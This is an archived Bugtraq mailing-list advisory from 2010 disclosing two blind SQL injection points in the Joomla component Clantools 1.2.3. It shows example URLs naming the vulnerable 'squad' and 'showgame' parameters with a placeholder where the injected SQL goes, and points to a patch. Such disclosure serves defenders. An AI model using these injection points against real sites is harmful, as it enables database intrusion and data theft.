[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities
From: sattler@xxxxxxxxxxxxx
Date: 5 Sep 2010 11:22:38 -0000

# Exploit Title: Joomla Component Clantools version 1.2.3 Multiple Blind SQL 
Injection Vulnerabilities
# Date: 05.09.2010
# Author: Stephan Sattler // Solidmedia
# Software Link: 
http://www.joomla-clantools.de/downloads/doc_download/7-clantools-123.html
# Version: 1.2.3


[ Vulnerability 1 ]

http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[Blind 
SQL]

[ Vulnerability 2 ]

http://www.site.com/joomlapath/index.php?option=com_clantools&task=clanwar&showgame=1+[Blind
 SQL]&Itemid=999

#Vulnerability was already reported, have a look at 
http://www.joomla-clantools.de to get a patch

Prev by Date: Re: KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll)
Next by Date: [SECURITY] [DSA-2104-1] New quagga packages fix denial of service
Previous by thread: chillyCMS Multiple Vulnerabilities
Next by thread: [SECURITY] [DSA-2104-1] New quagga packages fix denial of service
Index(es):
- Date
- Thread